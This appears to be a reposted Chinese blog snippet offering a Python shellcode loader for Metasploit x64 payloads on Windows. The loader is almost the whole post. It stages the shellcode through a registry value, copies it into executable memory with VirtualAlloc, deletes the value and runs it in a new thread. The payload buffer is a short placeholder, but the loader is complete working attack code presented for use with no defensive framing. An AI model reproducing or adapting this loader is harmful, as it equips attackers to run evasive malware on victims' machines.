python shellcode加载器

默认是x64位的msf

from ctypes import *
from ctypes import wintypes
import ctypes
buf =  b""
buf += b"\x56\xff\xd5"

ctypes.windll.Advapi32.RegSetValueExA(-2147483647, "test", None, 3, buf,len(buf))
LPBYTE = POINTER(c_byte)
ctypes.windll.kernel32.VirtualAlloc.restype = LPBYTE
ptr = ctypes.windll.kernel32.VirtualAlloc(0,800,0x3000,0x40)
data_len = wintypes.DWORD()
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647, "test", 0, 0, 0, byref(data_len))
ctypes.windll.Advapi32.RegQueryValueExA(-2147483647,"test",0,None,ptr,byref(data_len))
ctypes.windll.Advapi32.RegDeleteValueA(-2147483647, "test")
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

标签：python,windll,len,kernel32,ctypes,2147483647,test,shellcode,加载
来源： https://www.cnblogs.com/xcymn/p/15336365.html